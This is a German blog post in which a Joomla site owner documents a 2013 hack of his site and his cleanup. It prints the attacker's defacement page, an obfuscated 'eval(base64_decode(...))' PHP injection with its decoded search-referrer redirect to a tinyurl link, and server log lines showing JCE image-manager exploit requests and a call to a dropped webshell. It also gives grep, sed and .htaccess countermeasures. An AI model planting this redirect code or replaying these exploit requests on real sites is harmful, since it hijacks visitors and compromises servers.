Bewertung: 5 / 5

Stern aktivStern aktivStern aktivStern aktivStern aktiv
 

Grundsätzlich verschliesse ich meine Joomla-Site (v 1.5.26) nach der Bearbeitung mit diesem Script :

 

cd /pfad/zum/www/
chmod 755 seite
cd seite
find . -type f -exec chmod 644 {} \;
find . -type d -exec chmod 755 {} \;
cd ~
chown -R www-data.www-data /pfad/zum/www/seite
ls -l /pfad/zum/www/seite

Nur leider nicht am 17.04.2013. Da habe ich es schlichtweg vergessen. Irgendjemand mit der Unterschrift...

gh.html
<html>
<head>
<meta http-equiv="Content-Language" content="fr">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Hacked by ghost-dz</title>
</head>
<body bgcolor="#000000">
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center"><font size="8" color="#FFFFFF">Hacked by ghost-dz</font></p>
<p align="center"><font size="8" color="#FF0000">Algerian Hacker</font></p>
</body>
</html>

...legte Dateien in meiner Webroot ab und schleuste ebenso diesen Schadcode in diversen Dateien ein (alles in einer Zeile, incl "eval" und "));" 1172 Zeichen):

<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj
1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJW
RVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQ
UdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cm
lzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibG
VyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmV
yZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN
0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2Vi
YWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0
cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJl
ciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvci
BwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJ
mxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pX
C91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3B
hY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Ig
c3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJ
lZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJD
QoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly90aW55dXJsLmNvbS9kM3oyMm
I2Iik7DQoJCWV4aXQoKTsNCgl9DQp9DQp9"
));

Dies wiederum führte dazu, dass z. B. nach einer Suche in einer grossen Suchmaschine bei einem Klick auf das Ergebnis nicht mein Server das aufgerufene Anzeigeziel war, sondern auf irgendwelche dubiosen Werbeseiten verwiesen wurde. Also half nur eins, die befallenen Dateien suchen und den Schadcode entfernen.

Der Vollständigkeit halber : Decodiert steht in oben genannter "eval-base64-zeile" :

 
error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo")
or stristr($referer,"bing")
or stristr($referer,"rambler")
or stristr($referer,"gogo")
or stristr($referer,"live.com")
or stristr($referer,"aport")
or stristr($referer,"nigma")
or stristr($referer,"webalta")
or stristr($referer,"begun.ru")
or stristr($referer,"stumbleupon.com")
or stristr($referer,"bit.ly")
or stristr($referer,"tinyurl.com")
or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer)
or preg_match ("/google\.(.*?)\/url\?sa/",$referer)
or stristr($referer,"myspace.com")
or stristr($referer,"facebook.com")
or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){		
		header("Location: http://tinyurl.com/d3z22b6");
		exit();
	}
}
}

6. bis 22. stehen dabei in einer Zeile. Das wäre hier jedoch schwerst leserlich.

Der Schadcode führt also dazu, dass alle Verlinkungen von z. B. Google, AOL, Facebook usw. redirected werden auf eine "Werbeseite". In diesem Fall auf "h**p://tinyurl.com/d3z22b6"

Mit diesem Kommando begab ich mich dann also auf die Suche nach dem Schadcode :

grep -Rsl "eval(base64_decode(" /pfad/zum/www/seite/ > befallen.txt

In der "befallen.txt" finden wir dann unsere verseuchten Dateien.

Ohjee. über 180 Stück.

Also habe ich mir ein Script gebastelt, das mir die befallenen Dateien sucht und den Code dann herausschneidet :

 

#!/bin/bash
for x in $(grep -Rsl "eval(base64_decode(" /pfad/zum/www/seite/); do
    sed -i s/'eval(base64_decode( ...und so weiter...'//g $x
done

Ergebnis : (Fast) kein Schadcode mehr auf meiner Seite. Folgende Dateien wurden jedoch noch am Befalltag auf meinen Webspace eingeschleust und händisch von mir gelöscht :

- w23822279n.php
- w3092525n.php
- wp-conf.php
- crossdomain.xml

Den Inhalt derer später...

...und sie kommen immer wieder. Sie haben anscheinend eine Hintertüre.

[klatschandiestirn]

Ich halte hier mal alles so fest, wie es mir über den Weg läuft. Wird zum Schluss dann sortiert und schöngeschrieben.

 

31.133.55.130 - - [28/Apr/2013:20:08:20 +0200] 
"POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=
imgmanager&method=form&cid=
20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743
HTTP/1.1"
200 72 "-" "BOT/0.1 (BOT for JCE)"
31.133.55.130 - - [28/Apr/2013:20:08:20 +0200]
"POST /index.php?option=com_jce&task=plugin&plugin
=imgmanager&file=imgmanager&version=1576&cid=20
HTTP/1.1"
200 36 "-" "BOT/0.1 (BOT for JCE)"
31.133.55.130 - - [28/Apr/2013:20:08:21 +0200]
"GET / HTTP/1.1"
200 22031 "-" "Mozilla/4.0
(compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
31.133.55.130 - - [28/Apr/2013:20:08:22 +0200]
"POST /w5526476n.php HTTP/1.1"
200 17 "-" "Mozilla/4.0
(compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

 

110.85.72.118 - - [28/Apr/2013:20:08:23 +0200] 
"GET /index.php?option=com_content&task=view&id=1245&itemid=181
HTTP/1.0"
200 49473
"http://haas.homelinux.net/index.php?option=com_content&task=view&id=1245&itemid=181" "Mozilla/5.0
(Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2"
110.85.72.118 - - [28/Apr/2013:20:08:26 +0200]
"GET /components/com_comment/joscomment/captcha.php?refid=0347dd4646a1ba27a52fd1424fa19023
HTTP/1.0"
200 4859 "http://haas.homelinux.net/index.php?option=com_content&task=view&id=1245&itemid=181"
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2"
110.85.72.118 - - [28/Apr/2013:20:08:28 +0200]
"GET /components/com_comment/joscomment/captcha.php?refid=0347dd4646a1ba27a52fd1424fa19023
HTTP/1.0"
200 4759 "http://haas.homelinux.net/index.php?option=com_content&task=view&id=1245&itemid=181"
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2"
110.85.72.118 - - [28/Apr/2013:20:08:29 +0200]
"GET /components/com_comment/joscomment/captcha.php?refid=0347dd4646a1ba27a52fd1424fa19023
HTTP/1.0"
200 4716 "http://haas.homelinux.net/index.php?option=com_content&task=view&id=1245&itemid=181"
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2"
110.85.72.118 - - [28/Apr/2013:20:08:30 +0200]
"GET /components/com_comment/joscomment/captcha.php?refid=0347dd4646a1ba27a52fd1424fa19023
HTTP/1.0"
200 4760 "http://haas.homelinux.net/index.php?option=com_content&task=view&id=1245&itemid=181"
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2"

Sofortfix (für mich) nach Überfliegen der o. g. Zeilen :

com_comment
und
- com_jce

deinstallieren !

Aber sie kommen wieder. Und zwar massenhaft, nachdem meine Domain anscheinend in eine Hackersuchmaschine eingetragen worden ist.

Kurzerhand habe ich die folgende Zeile in meine .htaccess aufgenommen :

RewriteCond %{QUERY_STRING} base64_decode.*\(.*\) [OR]
RewriteRule ^(.*)$ index.php [F,L]

...schaut im Moment ganz gut aus. Als Antwort bekommen externe Aufrufe dieses...

http://JOOMLAHOMEPAGE/index.php?option=com_mailto
Auflösen des Hostnamen
JOOMLAHOMEPAGE... "DNS-Server"
Verbindungsaufbau zu
JOOMLAHOMEPAGE|"IP-Adresse"|:80... verbunden.
HTTP-Anforderung gesendet, warte auf Antwort...
403 Forbidden
FEHLER 403: Forbidden.

...als Antwort.

 

[wird fortgesetzt]

SeitenURL :
Qr Code